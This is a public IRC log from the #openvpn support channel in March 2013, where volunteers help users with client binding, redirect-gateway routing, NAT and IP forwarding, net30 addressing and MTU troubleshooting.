[~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has quit [Remote host closed the connection] 12:53 -!- mitz_ [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has joined #openvpn 12:55 -!- penk [~dave@pool-100-0-131-24.bstnma.east.verizon.net] has joined #openvpn 12:56 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has quit [Quit: Computer has gone to sleep.] 13:00 -!- Cpt-Oblivious|af is now known as Cpt-Oblivious 13:08 -!- p3rror [~mezgani@41.248.139.241] has joined #openvpn 13:14 -!- benkay [~benkay@67.50.19.230] has quit [Quit: benkay] 13:23 <@EugeneKay> Yes 13:24 < rob0> No! 13:28 -!- p3rror [~mezgani@41.248.139.241] has quit [Quit: Leaving] 13:29 -!- MeanderingCode_ [~Meanderin@71-213-186-243.albq.qwest.net] has quit [Read error: Connection reset by peer] 13:30 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has joined #openvpn 13:30 <@krzee> CPU: Intel Core i7-3740QM 2.70GHz @ 2.7GHz [SSE3/SSSE3/SSE4.1/SSE4.2/x86_64/PAE/XD/VT/EST/OctaCore] L3: 6MB QPI: 0.1 GT/s RAM: 7.1GB/16.0GB swap: 3338.96M/4096.00M Disk: 48.22GB/465.48GB GPU: Intel HD Graphics 4000 & NVIDIA GeForce GT 650M [512 MB & 1024 MB/Stock] 2880X1800 OS: Mac OS X 10.8.3 (12D78) Kernel: 12.3.0 Arch: 64 Bit 13:31 <@EugeneKay> Always so negative 13:31 * EugeneKay cries 13:32 <@krzee> this thing is a beast 13:34 <@EugeneKay> I've been eyeballing the new Dell XPS 13 13:36 -!- js_ [~js@li503-152.members.linode.com] has quit [Ping timeout: 255 seconds] 13:36 -!- js_ [~js@li503-152.members.linode.com] has joined #openvpn 13:41 -!- Wulf [~Wulf@unaffiliated/wulf] has quit [Ping timeout: 256 seconds] 13:43 <@EugeneKay> I tihnk I'm gonna wait for the next gen of "Ultrabooks" though. Intel specs for them mandate a 9 hour battery life, and touchscreen. 13:44 -!- MeanderingCode [~Meanderin@71-213-186-243.albq.qwest.net] has joined #openvpn 13:49 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has quit [Read error: Operation timed out] 13:53 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has joined #openvpn 14:04 -!- mattock [~mattock@openvpn/corp/admin/mattock] has left #openvpn [] 14:04 -!- mattock [~mattock@openvpn/corp/admin/mattock] has joined #openvpn 14:04 -!- mode/#openvpn [+o mattock] by ChanServ 14:06 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has quit [Quit: Computer has gone to sleep.] 14:23 -!- pyrobisqit [~pyrobisqi@87.Red-88-5-221.dynamicIP.rima-tde.net] has quit [Quit: Main screen turn off] 14:23 -!- xbanux [~xbanux@triband-mum-59.182.131.162.mtnl.net.in] has quit [Ping timeout: 264 seconds] 14:33 -!- mitz [~mitz@khp222227247006.ppp-bb.dion.ne.jp] has joined #openvpn 14:36 -!- mitz_ [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has quit [Ping timeout: 272 seconds] 14:46 -!- djgerm [~Adium@75-149-56-244-SFBA.hfc.comcastbusiness.net] has joined #openvpn 14:47 < djgerm> Heya! I was wondering if anyone knows how to set the client source IP for openvpn in the client's config 14:47 < djgerm> i have multiple ip's per interface on my client, and I want to specify openvpn client to bind to a particular ip 14:48 < djgerm> like the "local" options for the server side 14:50 < pekster> djgerm: Use the --local option, just as you would on the server side, to specify the bind IP. Note that use of --port implies --lport. Change this yourself if the default is not what you want 14:51 < djgerm> thanks! 14:51 <@krzee> you may also need something in your firewall 14:51 -!- dioz [~dioz@2001:470:d:e3::1] has quit [Remote host closed the connection] 14:51 -!- dioz [~dioz@2001:470:d:e3::1] has joined #openvpn 14:52 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has joined #openvpn 14:52 < djgerm> thanks, I'll keep that in mind. 14:53 < djgerm> those dang firewalls, always causing trouble 14:54 < djgerm> i have nobind in that client config, should i take that out? 14:54 < djgerm> or that specifically for local port binding? 14:54 < pekster> Yup. local and nobind are incompatible 14:55 < djgerm> ok, makes sense 14:55 < pekster> --nobind pushes back to the OS to dynamically allocate an IP/port to sourceo the connection from. You give that feature up when you use either 14:55 <@krzee> bbl, ups dying and power out 14:56 <@krzee> (connection reset by 3rd world dsl) 14:58 -!- krzee [nobody@openvpn/community/support/krzee] has quit [Read error: Connection reset by peer] 15:01 -!- Eagleman [~Eagleman@vpn.eagleman.net] has quit [Ping timeout: 252 seconds] 15:06 -!- CygniX [~CygniX@unaffiliated/twois10] has joined #openvpn 15:18 -!- Denial- [Denial@cpc15-tonb3-2-0-cust76.16-3.cable.virginmedia.com] has joined #openvpn 15:20 -!- nonotza [~nonotza@rrcs-50-74-239-162.nyc.biz.rr.com] has joined #openvpn 15:20 -!- Denial [~Denial@cpc15-tonb3-2-0-cust76.16-3.cable.virginmedia.com] has quit [Ping timeout: 256 seconds] 15:20 -!- Denial- is now known as Denial 15:29 -!- speed_racer8 [~speed_rac@h4.185.30.71.dynamic.ip.windstream.net] has quit [Ping timeout: 272 seconds] 15:35 -!- tcamuso_ [tcamuso@nat/redhat/x-hljszfqzgrogsjjn] has quit [Ping timeout: 255 seconds] 15:49 -!- krzee [nobody@openvpn/community/support/krzee] has joined #openvpn 15:49 -!- mode/#openvpn [+o krzee] by ChanServ 15:55 -!- zarrsh_ [~zarrsh@cpe-24-95-76-206.columbus.res.rr.com] has joined #openvpn 15:57 -!- cjs226 [~cjs226@99-42-101-89.lightspeed.austtx.sbcglobal.net] has quit [] 16:00 -!- gffa [~unknown@unaffiliated/gffa] has quit [Quit: quit] 16:09 -!- penk [~dave@pool-100-0-131-24.bstnma.east.verizon.net] has quit [Quit: Linkinus - http://linkinus.com] 16:11 -!- speed_racer8 [~speed_rac@c-76-30-144-32.hsd1.tx.comcast.net] has joined #openvpn 16:20 -!- master_of_master [~master_of@p4FF24672.dip.t-dialin.net] has quit [Ping timeout: 246 seconds] 16:22 -!- master_of_master [~master_of@p4FF24D8B.dip.t-dialin.net] has joined #openvpn 16:30 -!- kubbing [~kubbing@89.177.146.18] has joined #openvpn 16:37 -!- djgerm [~Adium@75-149-56-244-SFBA.hfc.comcastbusiness.net] has left #openvpn [] 16:51 -!- cjs226 [~cjs226@99-61-64-43.lightspeed.austtx.sbcglobal.net] has joined #openvpn 17:03 -!- speed_racer8 [~speed_rac@c-76-30-144-32.hsd1.tx.comcast.net] has quit [Ping timeout: 248 seconds] 17:05 -!- zarrsh_ [~zarrsh@cpe-24-95-76-206.columbus.res.rr.com] has quit [Ping timeout: 256 seconds] 17:13 -!- zarrsh_ [~zarrsh@cpe-24-95-76-206.columbus.res.rr.com] has joined #openvpn 17:21 -!- mitz_ [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has joined #openvpn 17:22 -!- zarrsh_ [~zarrsh@cpe-24-95-76-206.columbus.res.rr.com] has quit [Read error: Connection reset by peer] 17:23 -!- mitz [~mitz@khp222227247006.ppp-bb.dion.ne.jp] has quit [Ping timeout: 272 seconds] 17:33 -!- JSharpe [~JSharpe@ip5-63-150-164.lon.ukinetcom.net] has quit [Read error: Connection reset by peer] 17:33 -!- speed_racer8 [~speed_rac@c-98-196-168-201.hsd1.tx.comcast.net] has joined #openvpn 17:33 -!- JSharpe [~JSharpe@ip5-63-150-164.lon.ukinetcom.net] has joined #openvpn 17:35 -!- CygniX [~CygniX@unaffiliated/twois10] has quit [Quit: Konversation terminated!] 17:39 -!- Sidewinder [~de@unaffiliated/sidewinder] has quit [Quit: Leaving] 17:49 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has quit [Quit: Computer has gone to sleep.] 18:02 -!- nonotza [~nonotza@rrcs-50-74-239-162.nyc.biz.rr.com] has quit [Quit: nonotza] 18:02 -!- nutron [~nutron@unaffiliated/nutron] has quit [Remote host closed the connection] 18:03 < jzaw> lol pekster does reading and talking about a thing make it start to exhibit 18:03 < jzaw> suddenly i had tx problems over ssh over vpn ... tcp-nodelay helps .... but still not as good as yesterday 18:03 < jzaw> self prophetic eh 18:18 -!- SuperGauntlet [~supergaun@d14-69-67-219.try.wideopenwest.com] has joined #openvpn 18:19 < SuperGauntlet> quick question, do I need to specify proto tcp in client.conf if I'm connecting to a TCP server or is it automatic? 18:19 < Poster> you need to specify, default is UDP 18:19 < SuperGauntlet> so just do proto tcp in client.conf? 18:20 <@krzee> !tcp 18:20 <@vpnHelper> "tcp" is (#1) Sometimes you cannot avoid tunneling over tcp, but if you can avoid it, DO. http://sites.inka.de/~bigred/devel/tcp-tcp.html Why TCP Over TCP Is A Bad Idea. or (#2) http://www.openvpn.net/papers/BLUG-talk/14.html for a presentation by James Yonan (OpenVPN lead developer) or (#3) if you must use tcp, you likely want --tcp-nodelay 18:21 < SuperGauntlet> Does that go in server.conf? 18:21 <@krzee> both confs must be on tcp 18:21 < SuperGauntlet> right, but the tcp-nodelay option is in server.conf correct? 18:23 -!- nutron [~nutron@unaffiliated/nutron] has joined #openvpn 18:28 <@krzee> The macro expands as follows: 18:28 <@krzee> if mode server: 18:28 <@krzee> socket-flags TCP_NODELAY 18:28 <@krzee> push "socket-flags TCP_NODELAY" 18:30 -!- krzee [nobody@openvpn/community/support/krzee] has quit [Quit: This computer has gone to sleep] 18:51 -!- nutron [~nutron@unaffiliated/nutron] has quit [Quit: I must go eat my cheese!] 18:58 -!- pyrobisqit [~pyrobisqi@87.Red-88-5-221.dynamicIP.rima-tde.net] has joined #openvpn 19:01 -!- pyrobisqit [~pyrobisqi@87.Red-88-5-221.dynamicIP.rima-tde.net] has quit [Remote host closed the connection] 19:15 -!- tcamuso_ [~tcamuso@pool-71-161-82-88.cncdnh.east.myfairpoint.net] has joined #openvpn 19:23 -!- mitz [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has joined #openvpn 19:24 -!- mitz_ [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has quit [Ping timeout: 245 seconds] 19:30 -!- md_5 [md_5@mcdevs/trusted/md-5] has quit [Ping timeout: 255 seconds] 19:31 -!- raidz is now known as raidz_away 19:32 -!- md_5 [md_5@mcdevs/trusted/md-5] has joined #openvpn 19:43 -!- JPeterson [~JPeterson@s213-103-210-215.cust.tele2.se] has quit [Quit: I love my HydraIRC -> http://www.hydrairc.com <-] 19:47 -!- JPeterson [~JPeterson@s213-103-210-215.cust.tele2.se] has joined #openvpn 19:47 -!- Valcorb|| [~Valcorb@d54C68BC0.access.telenet.be] has joined #openvpn 19:49 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has quit [Ping timeout: 256 seconds] 20:04 -!- Valcorb|| [~Valcorb@d54C68BC0.access.telenet.be] has quit [] 20:15 -!- Cpt-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has quit [] 21:18 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has joined #openvpn 21:20 -!- cjs226 [~cjs226@99-61-64-43.lightspeed.austtx.sbcglobal.net] has quit [] 21:32 -!- mitz_ [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has joined #openvpn 21:33 -!- mitz [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has quit [Ping timeout: 258 seconds] 21:49 -!- zarrsh_ [~zarrsh@cpe-24-95-76-206.columbus.res.rr.com] has joined #openvpn 21:51 -!- zarrsh [~zarrsh@cpe-65-27-192-220.cinci.res.rr.com] has joined #openvpn 21:53 -!- penk [~dave@216.142.113.243] has joined #openvpn 22:02 -!- dfoolz [~Anon@94.75.239.204] has joined #openvpn 22:02 < dfoolz> hello. anyone feel like offering some assistance? I've got openvpn server setup and connected with a windows client, but can't seem to figure out how to actually tunnel any of my traffic through the vpn connection. 22:04 < dfoolz> I see the TAP adapter is connected under LAN2, but it says there is no network access on the connection and there are very few packets being sent/received 22:04 < dfoolz> tracerout on the ip im assigned on client takes me nowhere :/ 22:05 -!- speed_racer8 [~speed_rac@c-98-196-168-201.hsd1.tx.comcast.net] has quit [Ping timeout: 258 seconds] 22:05 < dfoolz> openvpn.log is just showing: Need IPv6 code in mroute_extract_addr_from_packet 22:15 -!- md_5 [md_5@mcdevs/trusted/md-5] has quit [Quit: ZNC - http://znc.in] 22:15 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has quit [Quit: Computer has gone to sleep.] 22:17 -!- nonotza [~nonotza@cpe-74-73-232-198.nyc.res.rr.com] has joined #openvpn 22:17 -!- dfoolz [~Anon@94.75.239.204] has quit [Ping timeout: 245 seconds] 22:21 -!- nonotza [~nonotza@cpe-74-73-232-198.nyc.res.rr.com] has quit [Ping timeout: 245 seconds] 22:37 -!- nonotza [~nonotza@cpe-74-73-232-198.nyc.res.rr.com] has joined #openvpn 22:37 -!- mitz_ [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has quit [Ping timeout: 258 seconds] 22:38 -!- mitz [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has joined #openvpn 22:40 -!- penk [~dave@216.142.113.243] has quit [Quit: Leaving...] 23:08 -!- mitz [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has quit [Ping timeout: 258 seconds] 23:10 -!- mitz [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has joined #openvpn 23:34 -!- TORcruzer [~TORcruzer@gateway/tor-sasl/torcruzer] has joined #openvpn 23:36 < TORcruzer> UDP on Linux, I can Ping, DNS, Even 'short' http requests. However, any real website like google drops off after first GET request. This happens on both TUN and TAP. Any ideas? 23:36 < Poster> are you allowing ICMP across the link? 23:38 < Poster> my guess is that you're needing fragmentation for larger requests, remember your MTU is going to be smaller on a VPN link due to encryption overhead 23:42 < TORcruzer> I am fairly sure I am. I know Ping request go though. Is there a specific ICMP type that you think may be killing the connection? --- Shoot, I can't find the page now, but I did try setting the mssfixed and mss 1300 (I think) and mtu 1500... Same problem 23:44 < TORcruzer> TCP no problem at all. However my ISP RoadRunner dose Traffic shapping on many IP ranges. My VPS is one of them. The max speed Road Runner will let any single TCP connect run at is 3Mb/s. iperf shows that I get can get 10Mb/s with UDP 23:45 < TORcruzer> Question: Is this Legal in the USA ? Selective IP/Domain rate limiting? 23:45 < Poster> is your UDP connection on port 53? 23:46 < Poster> the ICMP type I was going to suggest watching for is fragmentation needed 23:46 < TORcruzer> I ran iperf over port 5001 UDP. 10Mb/s TCP on any port is caped at 3Mb/s 23:46 < Poster> how many threads did you use to get 10Mb/s ? 23:47 < TORcruzer> iperf defualt settings with the -u ... 23:47 < Poster> a 10Mb connection is not likely going to see 10Mb on a single transfer ; you really need to have multiples to see the speed 23:47 < Poster> which you probably did with iperf 23:48 < Poster> there's latency and possibly packet loss which neither of which generally exist on a LAN 23:48 < TORcruzer> Well, I can download a file from my HTTP server... Caped at 3Mb/s Kernel.org HTTP 10Mb/s 23:48 -!- Anonmoose_ [~Anon@94.75.243.165] has joined #openvpn 23:48 < Anonmoose_> okay so I'm connected and the dns requests seem to be going through openvpn on the server 23:49 < Anonmoose_> but nothing will load beyond that :c 23:49 < Anonmoose_> i think it has to do with the nat forwarding in iptables, but im not sure how to fix it :/ 23:49 < TORcruzer> 7Mb/s seems a little much for TCP overhead ? 23:49 < Poster> ok well that's pretty good ; can others get more than 3Mb/s from your HTTP server? 23:49 < TORcruzer> Not all domains are rate limited. Like Kernel.org is not. 23:50 < TORcruzer> Yes, I can transfer at 50Mb/s to my other server 23:50 < TORcruzer> Like server to server 23:50 < Poster> are they near eachother? 23:51 < TORcruzer> Yes, On is NL other in Germany. Both VPS's 23:51 < Poster> ok and what is your download speed from your other server? 23:51 < TORcruzer> 8Mb/s 23:52 < Poster> do they share common routes to you? 23:52 < TORcruzer> That I do not know. However, they are diffrinet VPS hosting providers 23:53 < Poster> from what I can tell kernel.org is west coast USA and your VPS are in Europe 23:53 < TORcruzer> Yes 23:53 < Poster> not sure where you are but I am guessing you're getting higher latency to Europe 23:53 < TORcruzer> Yes, I latency, but through put should not be effected that much 23:54 < TORcruzer> ... correction Yes, High latency 23:54 < Poster> you might be surprised 23:55 < TORcruzer> I'll try downloading from a linux mirror in NL ... 23:56 < Poster> Anonmoose_: are you trying to route all traffic across your link? 23:57 < Anonmoose_> Poster: Yep. 23:57 < Anonmoose_> All my local traffic (apart from some ssh tunnels) seem to be going through the VPN, and I can see the dns requests hitting the remote vpn in wireshark, however, nothing works beyond that. 23:58 < Poster> ok did you setup your VPN link to become the default gateway? 23:58 < Anonmoose_> with this in the client config? redirect-gateway def1 23:59 < Anonmoose_> that does seem to be doing the trick of forwarding all local traffic (apart from my ssh tunnels, which stay connected like normal) 23:59 < Poster> ok so what OS is the remote side? 23:59 < Anonmoose_> debian 23:59 < Poster> ok have you enabled IP forwarding? --- Day changed Sat Mar 23 2013 00:00 < Anonmoose_> through iptables? I tried, but I'm pretty nub at it and I'm sure it's not properly configured 00:00 < Poster> ok first try this 00:00 < Poster> cat /proc/sys/net/ipv4/ip_forward 00:00 < Poster> does it return a 0 or 1 ? 00:01 < Anonmoose_> 1. I did get that done :) 00:01 <@EugeneKay> !linipforward 00:01 <@vpnHelper> "linipforward" is (#1) echo 1 > /proc/sys/net/ipv4/ip_forward for a temp solution (til reboot) or set net.ipv4.ip_forward = 1 in sysctl.conf for perm solution or (#2) chmod +x /etc/rc.d/rc.ip_forward for perm solution in slackware or (#3) you also must allow forwarding in your forward chain in iptables. iptables -I FORWARD -i tun+ -j ACCEPT 00:01 < Poster> ok so from your VPN client, try to ping the public IP of the Debian host 00:01 < Poster> and watch to see the traffic across wireshark 00:02 < Anonmoose_> oooh that does seem to bee connecting :) 00:02 < Poster> ok and when you try to ping other sites on the Internet, is that failing? 00:02 < Anonmoose_> yep, after the dns request it just times out 00:02 < Anonmoose_> but I do see it in wireshark hitting the remote servers dns 00:02 < Poster> ok on you Debian host, assuming your public adapter is eth0, type this 00:03 < Poster> sudo /sbin/iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE 00:03 < Poster> then retry pinging a remote host on the Internet from your VPN client 00:03 < Anonmoose_> hmmm still just timing out 00:04 < Anonmoose_> I wonder if it could be the dns server failing. 00:04 < Poster> is eth0 your public interface? 00:04 < Anonmoose_> actually I dont think so because I cant access IP's directly either 00:04 < Anonmoose_> yeah it is 00:04 < Poster> ok, try a traceroute to the Debian public IP 00:04 < Poster> does it traverse the VPN? 00:06 < Anonmoose_> hmmm 00:06 < Anonmoose_> oddly enough it took the regular route through my isp to the remote server 00:06 < Anonmoose_> going very slow too 00:07 < Poster> ok doesn't sound like the client is routing all traffic to the VPN system 00:07 < Anonmoose_> yeah it took a long time but it finally made it to the remote ip 00:07 < Anonmoose_> hmmmm 00:07 < Poster> can you ping the other side of the VPN tunnel by it's (presumably private) IP address? 00:08 < Anonmoose_> yep, the ip it assigned (10.8.0.6) is responding to pings 00:08 < Poster> ok what is the client OS? 00:08 < Anonmoose_> doze :x 00:08 < Poster> ok try this ; start -> run -> cmd 00:08 < Poster> route add 8.8.8.8 mask 255.255.255.255 10.8.0.6 00:08 < Poster> then try to ping 8.8.8.8 00:09 < Anonmoose_> OK! 00:09 < TORcruzer> Poster: Hum... Okay so I guess you are right, they may be trafic shaping but that is not proof... I'll drop that. 00:09 < Poster> TORcruzer; unfortunately latency does nasty things to bandwidth =[ 00:09 < Anonmoose_> hmm reply from 10.8.0.6: Destination host unreachable 00:10 < Poster> ok is the Debian host running iptables? 00:10 < Poster> aside from what I suggested you add earlier 00:11 < Anonmoose_> yep 00:12 < Poster> ok, based on what you're reporting, there is likely an iptables rule on FORWARD which is rejecting forwarding of packets 00:12 < Anonmoose_> is there a way I can list the ones currently active? 00:12 < Poster> yep ; 00:12 < Poster> sudo iptables -L -n 00:12 < Poster> will show the filter table 00:12 < Anonmoose_> hmm 00:12 < Anonmoose_> Chain INPUT (policy ACCEPT) 00:12 < Anonmoose_> target prot opt source destination 00:12 < Anonmoose_> Chain FORWARD (policy ACCEPT) 00:12 < Anonmoose_> target prot opt source destination 00:12 < Anonmoose_> Chain OUTPUT (policy ACCEPT) 00:12 < Anonmoose_> target prot opt source destination 00:12 < Anonmoose_> that's it :/ 00:12 < Poster> bummer 00:13 < Poster> ok and just to confirm, if you type ifconfig on your Debian host, you see 10.8.0.6 on a tap/tun adapter? 00:13 < Anonmoose_> yup 00:13 < Anonmoose_> inet addr:10.8.0.1 P-t-P:10.8.0.2 Mask:255.255.255.255 00:13 < Anonmoose_> or hmm 00:13 < Anonmoose_> not .6 lol 00:13 < Poster> well that changes a bit 00:13 < Anonmoose_> o_O 00:13 < Poster> on your Windows host, type 00:14 < Poster> route delete 8.8.8.8 mask 255.255.255.255 10.8.0.6 00:14 < Poster> route add 8.8.8.8 mask 255.255.255.0 10.8.0.1 00:14 < pekster> No 00:14 < pekster> For net30 that's not how it works 00:14 < pekster> !net30 00:14 <@vpnHelper> "net30" is "/30" is (#1) http://openvpn.net/index.php/documentation/faq.html#slash30 explains why routed clients each use 4 ips, or (#2) you can avoid this behavior with by reading !topology 00:14 < pekster> 10.8.0.6 is the peering IP in the /30 subnet 00:14 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has joined #openvpn 00:14 < Anonmoose_> hmm The route deletion failed: Element not found 00:14 < pekster> It's PtP; it's quite possible to set up asymettric IPs routes 00:15 < pekster> (and in the case of net30, it is set up like this) 00:15 < pekster> Did you see this yet? It sounds like some of your routes aren't going across the link when you want them to: 00:15 < pekster> !redirect 00:15 <@vpnHelper> "redirect" is (#1) to make all inet traffic flow through the vpn, you will need --redirect-gateway (see !def1), as well as IP forwarding (see !ipforward) and NAT (see !nat) enabled on the server. or (#2) you may need to use a different dns server when redirecting gateway, see !dns or !pushdns or (#3) if using ipv6 try: route-ipv6 2000::/3 or (#4) Handy troubleshooting flowchart: 00:15 <@vpnHelper> http://ircpimps.org/redirect.png 00:16 < Poster> wouldn't it be 10.8.0.0 - network ; 10.8.0.1 - host 1 ; 10.8.0.2 - host b ; 10.8.0.4 - broadcast ? 00:16 < Anonmoose_> nice chart lol 00:16 < pekster> Poster: For the server. You cannot access that inside the virtual /30 for the client 00:16 < Poster> I was trying to talk through adding a static route via 10.8.0.1 to see if it would pass the traffic 00:16 < pekster> Hence the client uses .6 and .5 00:16 < pekster> Right, you can't do that Poster 00:16 < pekster> It's not "on-link" on the virtual faked /30 00:16 < pekster> Of course, 'topology subnet' fixes that, just like the bot's output said 00:17 <@EugeneKay> Actually, that bot factoid doesn't say that. 00:17 <@EugeneKay> !/30 00:17 <@vpnHelper> "/30" is (#1) Default behaviour assigns a /30 subnet(4 addresses) to each peer. See http://goo.gl/6vemm for background or (#2) you can avoid this behavior by reading !topology or (#3) by default, first client is .6, then .10 .14 .18 etc or (#4) use openvpn --show-valid-subnets to see the subnets you can use in net30 or (#5) tl;dr Windows sucks, use --topology subnet in your server.conf 00:17 <@EugeneKay> That one doues. 00:17 < Anonmoose_> !nat 00:17 <@vpnHelper> "nat" is (#1) http://openvpn.net/howto.html#redirect for an explanation of NAT as it applies to openvpn or (#2) http://www.secure-computing.net/wiki/index.php/OpenVPN/FAQ#Traffic_forwarding_doesn.27t_work_when_using_client_specific_access_rules or (#3) dont forget to turn on ip forwarding or (#4) please choose between !linnat !winnat and !fbsdnat for specific howto 00:17 < pekster> EugeneKay: Hmm, too many similar factoids :P 00:17 <@EugeneKay> pekster - read net30 closely; it's an old copy of /30 ;-) 00:18 < Poster> ok I guess I was used to manually assigning each side when using a /30 00:18 < TORcruzer> pekster: You you think I should try adding --fragment or --mssfix to help fix UDP problem... Or both? 00:18 < Poster> haven't used that approach ; I get it now 00:18 -!- dfoolz [~Anon@fuge.it] has joined #openvpn 00:18 < dfoolz> :| 00:19 < pekster> TORcruzer: First make sure you've set everything up on that flowchart correctly, and verify a ping to some external host (8.8.8.8 works) flows as expected across the VPN. Then see if it's an MTU issue by sending a packet at your MTU across the VPN to the same external host 00:19 < dfoolz> uh oh. i just kicked my server offline with faulty iptable parmaters :| 00:19 <@EugeneKay> Sweet. 00:19 < pekster> If the first test works but the 2nd fails, you have MTU issues that need fixing with fragment, or possibly by using the --mtu-test feature that will tell you exactly what the detected MTU is (that'll take a few minutes to run) 00:20 < pekster> Then turn around and apply that value; see the --mtu-test option in the manpage for specifics 00:20 < TORcruzer> pekster: Okay, I'll report back 00:20 -!- TORcruzer [~TORcruzer@gateway/tor-sasl/torcruzer] has quit [Quit: WeeChat 0.4.0] 00:21 * pekster awaits IPv6's arrival where PMTU-discovery is built into the protocol's design better 00:23 -!- Anonmoose_ [~Anon@94.75.243.165] has quit [Ping timeout: 264 seconds] 00:27 < Poster> I do wonder if it will ever arrive 00:28 < pekster> Nothing really requires native v6, so ISPs & mfgr's won't make it a priority. Because of that, companies hosting content don't either. It's a nasty cycle, ending with more NAT for everyone. See RFC6598 for a wonderful example 00:29 < pekster> On the plus side, OpenVPN >=2.3.0 supports v6 now :) 00:29 < Poster> that's good ; yeah I see it as the whole chicken and egg thing 00:30 < Poster> if more client demand existed, the providers would probably invest the resources to get there ; but since it's not there the clients seem to be making due 00:31 < Poster> I think cellular providers use ipv6 inside their networks for data, but probably hide behind ipv4 for most web access 00:33 <@EugeneKay> Stop whining and start using 00:34 < pekster> Hey, I'm doing my part. ISP doesn't do v6, so I'm on Freenode via a broker :) 00:34 <@EugeneKay> Every time you say "IPv6 is a chicken and egg problem" is that much less time spent becoming the chicken. 00:34 * EugeneKay bawks 00:34 < Poster> heh 00:34 < Poster> it doesn't matter a whole lot to me 00:34 < pekster> I need to get my phone doing v6 via my OpenVPN connection at home too 00:34 < pekster> That's be nice 00:35 < Poster> I'd have to get ipv6 from somewhere else to 00:35 < pekster> HE or sixxs offer free brokering services 00:37 -!- SuperGauntlet [~supergaun@d14-69-67-219.try.wideopenwest.com] has quit [Read error: Connection reset by peer] 00:37 -!- TORcruzer [~TORcruzer@gateway/tor-sasl/torcruzer] has joined #openvpn 00:39 < TORcruzer> I tried setting the fragment REALLY low all the way down to 1000 and had mssfix in there. Still on UDP I Can Ping, DNS, 'small' http transfer. But say I wget google.com It always stops after 5 packets 00:40 < pekster> And you learned what by doing pings with the DF ("don't fragment") bit set and running --mtu-test ? 00:41 < TORcruzer> ? I have never done that... i did run this and it works fine, ping -M do -s 1472 ... This is the HTTP that dose work curl --get http://tnx.nl/ip 00:41 < TORcruzer> The ping ended in 8.8.8.8 00:42 < TORcruzer> and the other end of the TUN poin-to-pint link 00:42 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has quit [Remote host closed the connection] 00:42 < pekster> Right, so that 1472 ping (max you can send in ICMP data with all the overhead on a 1500MTU link) means any fragmentation is working properly between your VPN peers 00:43 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has joined #openvpn 00:43 < pekster> It's also possible any --comp-lzo setting is interfering with the ping test since it compresses data, likely interfering with the actual resulting packet sizes 00:43 < TORcruzer> pekster, okay. Do you have any other ideas why I can only send 5 packets? 00:44 < pekster> 5 packets? As in you can ping 5 times but the 6th fails? That sounds like DPI/IDS 00:44 < pekster> ie: something actively stopping the traffic 00:44 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has quit [Remote host closed the connection] 00:45 < TORcruzer> Awe, okay. Owe, sorry that was confusing... I mean any website other then http://tnx.nl/ip that I try to go to always stops after the first GET 5 packets in 00:45 < TORcruzer> In Wireshark listening on the Tun interface 00:46 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has joined #openvpn 00:47 < TORcruzer> I see the ACK from the GET but then it ends. 00:48 < pekster> Is the MSS set properly in the SYN and SYN+ACK during establishment? 00:49 < pekster> If you're using --fix-mss it should be 00:51 < TORcruzer> I tell Google mss 1460 .. Google tells me mss 1368 00:52 < TORcruzer> ... i.e. SYN mss 1460 : SYN, ACK 1368 00:52 < pekster> 1460 sounds wrong if you're still using 1400 or 1200 or 1000 or something in your --fragment line 00:53 < TORcruzer> That is what happend on default settings.... dose it look okay then? 00:54 < TORcruzer> Would you like me to try again with fragment 1000 and mssfix added. 00:54 < pekster> Manpage says 1450 is the default, but 1460 might be okay assuming PMTU is working 00:56 < pekster> Try using '--comp-lzo no' on both sides first, to rule out weirdness in your DF ping test. Then sure, try --fragment X --mssfix (where X can be 1000 if you want to start there. Usually values like 1300, 1200, 1000, etc are common first guesses) 00:56 < pekster> I should have noted that earlier, but I didn't think about the compression playing a role at the time 00:56 < TORcruzer> Okay, I'll do that and also check to make sure the mss is really being set 00:57 < pekster> It's very likely you have MTU problems since the next thing after the 'GET' request is the data 00:57 < pekster> And that'll likely span several packets or more 00:57 < TORcruzer> That sounds right to me too. Also considering that small one like HTTP request dose go through. 00:57 < pekster> Hopefully you can duplicate your symptoms with simple pings 00:57 < TORcruzer> Okay 00:57 < pekster> ie: no compression should leave the encapsulated data the same size as random "uncompressable" data too 00:58 < TORcruzer> will do 01:03 -!- TORcruzer [~TORcruzer@gateway/tor-sasl/torcruzer] has quit [Ping timeout: 276 seconds] 01:04 -!- TORcruzer [~TORcruzer@gateway/tor-sasl/torcruzer] has joined #openvpn 01:05 < TORcruzer> Okay, what dose (truncated) mean? The max I can ping at is 64... ping -M do -s 64 8.8.8.8 .. before I see (turncated) 01:05 < pekster> Oh, the peer is probably only returning 64 bytes 01:06 < pekster> Yea. Another host would be wise then, since you want to make sure the MTU works in both directions. The good news is it got out okay 01:06 < TORcruzer> Should I have been trying to ping the the Tun interface on the server? 01:06 < TORcruzer> Ya :p 01:07 < TORcruzer> I'll try the other end of the link... on sec 01:07 < pekster> Possibly, although that won't verify that it works for external hosts (you'd presume it would, but PMTU between your server and your desired endpoint could still also be hosed) 01:07 < pekster> That's likely a separate issue though 01:08 < pekster> 